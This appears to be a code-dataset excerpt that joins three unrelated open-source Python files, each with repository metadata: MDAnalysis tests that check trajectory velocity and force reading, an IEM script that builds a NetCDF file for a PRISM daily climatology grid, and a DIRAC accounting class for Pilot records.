             [19.42700005, -8.21600056, -0.24399999]], dtype=np.float32)
        self.prec = 3

    def testParse_velocities(self):
        # read the velocities from the GRO_velocity file and compare the
        # AtomGroup and individual Atom velocities parsed with the reference
        # values:
        u = MDAnalysis.Universe(GRO_velocity)
        all_atoms = u.select_atoms('all')
        # check read-in and unit conversion of .gro file velocities for the
        # entire AtomGroup:
        assert_almost_equal(all_atoms.velocities, self.reference_velocities,
                            self.prec,
                            err_msg="problem reading .gro file velocities")
        # likewise for each individual atom (to be robust -- in case someone
        # alters the individual atom property code):
        for i in range(6):
            assert_almost_equal(all_atoms[i].velocity,
                                self.reference_velocities[i], self.prec,
                                err_msg="problem reading .gro file velocities")
class TestTRRForces(object):
    def setUp(self):
        self.universe = MDAnalysis.Universe(PDB_xvf, TRR_xvf)
        # Protein forces extracted with g_traj into
        # cobrotoxin_protein_forces.xvg.bz2 and manually averaged over
        # 918 atoms and 3 time steps; native units: kJ/(mol*nm)
        self.reference_mean_protein_force_native = np.array(
            [3.4609879271822823, -0.63302345167392804, -1.0587882545813336],
            dtype=np.float32)
        # MDAnalysis units of kJ/(mol*A)
        self.reference_mean_protein_force = self.reference_mean_protein_force_native / 10
        self.prec = 6

    def tearDown(self):
        del self.universe

    @attr('slow')
    def testForces(self):
        protein = self.universe.select_atoms("protein")
        assert_equal(len(protein), 918)
        mean_F = np.mean([protein.forces.mean(axis=0) for ts in self.universe.trajectory], axis=0)
        assert_almost_equal(mean_F, self.reference_mean_protein_force, self.prec,
                            err_msg="mean force on protein over whole trajectory does not match")


class TestTRRForcesNativeUnits(TestTRRForces):
    def setUp(self):
        super(TestTRRForcesNativeUnits, self).setUp()
        # get universe without unit conversion
        self.universe = MDAnalysis.Universe(PDB_xvf, TRR_xvf, convert_units=False)
        # native Gromacs TRR units kJ/(mol*nm)
        self.reference_mean_protein_force = self.reference_mean_protein_force_native
class TestAtomGroupVelocities(object):
    """Tests of velocity-related functions in AtomGroup"""
    def setUp(self):
        self.universe = MDAnalysis.Universe(GRO, TRR)
        self.ag = self.universe.select_atoms("bynum 12:42")

    def tearDown(self):
        del self.ag
        del self.universe

    @attr('slow')
    def test_get_velocities(self):
        v = self.ag.velocities
        assert_(np.any(np.abs(v) > 1e-6), "velocities should be non-zero")

    @attr('slow')
    def test_velocities(self):
        ag = self.universe.atoms[42:45]
        ref_v = np.array([
            [-3.61757946, -4.9867239, 2.46281552],
            [2.57792854, 3.25411797, -0.75065529],
            [13.91627216, 30.17778587, -12.16669178]])
        v = ag.velocities
        assert_almost_equal(v, ref_v, err_msg="velocities were not read correctly")

    @attr('slow')
    def test_set_velocities(self):
        ag = self.ag
        v = ag.velocities - 2.7271
        ag.velocities = v
        assert_almost_equal(ag.velocities, v,
                            err_msg="velocities were not set to new value")
class TestAtomGroupForces(object):
    """Tests of force-related functions in AtomGroup"""
    def setUp(self):
        self.universe = MDAnalysis.Universe(COORDINATES_XYZ, COORDINATES_TRR)
        self.ag = self.universe.atoms[1:4]

    def tearDown(self):
        del self.universe

    @attr('slow')
    def test_get_forces(self):
        v = self.ag.forces
        assert_(np.any(np.abs(v) > 1e-6), "forces should be non-zero")

    @attr('slow')
    def test_forces(self):
        ag = self.universe.atoms[1:4]
        ref_v = np.arange(9).reshape(3, 3) * .01 + .03
        v = ag.forces
        assert_almost_equal(v, ref_v, err_msg="forces were not read correctly")

    @attr('slow')
    def test_set_forces(self):
        ag = self.ag
        v = ag.forces - 2.7271
        ag.forces = v
        assert_almost_equal(ag.forces, v,
                            err_msg="forces were not set to new value")
|
kain88-de/mdanalysis
|
testsuite/MDAnalysisTests/core/test_group_traj_access.py
|
Python
|
gpl-2.0
| 16,540
|
[
"Gromacs",
"MDAnalysis"
] |
566ee88ddcda62447d290c32a8a5a708a9f40cb954d945765c7d5b84391176ba
|
"""Grid out dailyc for a daily climatology on PRISM grid.
Note: PRISM's climatology is monthly/annual, so no daily :/
"""
import datetime
import os
import numpy as np
from pyiem import prism
from pyiem.util import ncopen, logger
LOG = logger()
BASEDIR = "/mesonet/data/prism"
def init_year(ts):
    """
    Create a new NetCDF file for a year of our specification!
    """
    fn = f"{BASEDIR}/prism_dailyc.nc"
    if os.path.exists(fn):
        LOG.info("%s exists, skipping", fn)
        return
    nc = ncopen(fn, "w")
    nc.title = f"PRISM Climatology {ts.year}"
    nc.platform = "Gridded Climatology"
    nc.description = "PRISM"
    nc.institution = "Iowa State University, Ames, IA, USA"
    nc.source = "Iowa Environmental Mesonet"
    nc.project_id = "IEM"
    nc.realization = 1
    nc.Conventions = "CF-1.0"  # *cough*
    nc.contact = "Daryl Herzmann, akrherz@iastate.edu, 515-294-5978"
    nc.history = f"{datetime.datetime.now():%d %B %Y} Generated"
    nc.comment = "No Comment at this time"
    # Setup Dimensions
    nc.createDimension("lat", prism.NY)
    nc.createDimension("lon", prism.NX)
    ts2 = datetime.datetime(ts.year + 1, 1, 1)
    days = (ts2 - ts).days
    nc.createDimension("time", int(days))
    nc.createDimension("nv", 2)
    # Setup Coordinate Variables
    lat = nc.createVariable("lat", float, ("lat",))
    lat.units = "degrees_north"
    lat.long_name = "Latitude"
    lat.standard_name = "latitude"
    lat.bounds = "lat_bnds"
    lat.axis = "Y"
    # Grid centers
    lat[:] = prism.YAXIS
    lat_bnds = nc.createVariable("lat_bnds", float, ("lat", "nv"))
    lat_bnds[:, 0] = prism.YAXIS
    lat_bnds[:, 1] = prism.YAXIS + 0.04
    lon = nc.createVariable("lon", float, ("lon",))
    lon.units = "degrees_east"
    lon.long_name = "Longitude"
    lon.standard_name = "longitude"
    lon.bounds = "lon_bnds"
    lon.axis = "X"
    lon[:] = prism.XAXIS
    lon_bnds = nc.createVariable("lon_bnds", float, ("lon", "nv"))
    lon_bnds[:, 0] = prism.XAXIS
    lon_bnds[:, 1] = prism.XAXIS + 0.04
    tm = nc.createVariable("time", float, ("time",))
    tm.units = f"Days since {ts.year}-01-01 00:00:0.0"
    tm.long_name = "Time"
    tm.standard_name = "time"
    tm.axis = "T"
    tm.calendar = "gregorian"
    tm[:] = np.arange(0, int(days))
    p01d = nc.createVariable(
        "ppt", float, ("time", "lat", "lon"), fill_value=1.0e20
    )
    p01d.units = "mm"
    p01d.long_name = "Precipitation"
    p01d.standard_name = "Precipitation"
    p01d.coordinates = "lon lat"
    p01d.description = "Precipitation accumulation for the day"
    high = nc.createVariable(
        "tmax", float, ("time", "lat", "lon"), fill_value=-9999.0
    )
    high.units = "C"
    high.long_name = "2m Air Temperature Daily High"
    high.standard_name = "2m Air Temperature"
    high.coordinates = "lon lat"
    low = nc.createVariable(
        "tmin", float, ("time", "lat", "lon"), fill_value=-9999.0
    )
    low.units = "C"
    low.long_name = "2m Air Temperature Daily Low"
    low.standard_name = "2m Air Temperature"
    low.coordinates = "lon lat"
    nc.close()


def main():
    """Go Main"""
    init_year(datetime.datetime(2000, 1, 1))


if __name__ == "__main__":
    main()
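# Hedged check (editor's addition, assuming ncopen returns a netCDF4.Dataset
# usable as a context manager): re-open the file main() creates and verify
# the grid dimensions match the PRISM constants used above.
def _verify(fn=f"{BASEDIR}/prism_dailyc.nc"):
    with ncopen(fn) as nc:
        assert len(nc.dimensions["lat"]) == prism.NY
        assert len(nc.dimensions["lon"]) == prism.NX
        LOG.info("dimensions OK: %s x %s", prism.NY, prism.NX)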
|
akrherz/iem
|
scripts/prism/init_prism_dailyc.py
|
Python
|
mit
| 3,234
|
[
"NetCDF"
] |
80a738e6a21665759bbfa6994da6002e8caeeed1da3dc23cb3bb993c5c3e795e
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
__RCSID__ = "$Id$"
from DIRAC.AccountingSystem.Client.Types.BaseAccountingType import BaseAccountingType
class Pilot(BaseAccountingType):
    def __init__(self):
        super(Pilot, self).__init__()
        self.definitionKeyFields = [
            ("User", "VARCHAR(64)"),
            ("UserGroup", "VARCHAR(32)"),
            ("Site", "VARCHAR(64)"),
            ("GridCE", "VARCHAR(128)"),
            ("GridMiddleware", "VARCHAR(32)"),
            ("GridResourceBroker", "VARCHAR(128)"),
            ("GridStatus", "VARCHAR(32)"),
        ]
        self.definitionAccountingFields = [
            ("Jobs", "INT UNSIGNED"),
        ]
        self.checkType()
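# Hedged usage sketch (editor's addition): how a record of this type is
# typically filled and committed elsewhere in DIRAC. setValueByKey,
# setStartTime and setEndTime are inherited from BaseAccountingType; the
# gDataStoreClient commit step is an assumption based on other DIRAC agents,
# not on this file.
#
# pilotRecord = Pilot()
# pilotRecord.setStartTime()
# pilotRecord.setEndTime()
# pilotRecord.setValueByKey("User", "someuser")
# pilotRecord.setValueByKey("Site", "LCG.Example.org")
# pilotRecord.setValueByKey("GridCE", "ce.example.org")
# pilotRecord.setValueByKey("GridStatus", "Done")
# pilotRecord.setValueByKey("Jobs", 1)
# result = gDataStoreClient.addRegister(pilotRecord)  # assumed import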
|
ic-hep/DIRAC
|
src/DIRAC/AccountingSystem/Client/Types/Pilot.py
|
Python
|
gpl-3.0
| 775
|
[
"DIRAC"
] |
1d32f4152552d3d7ca68fe6e7b90fca09f9125614a8f4b74c22c445fda9dd42f
|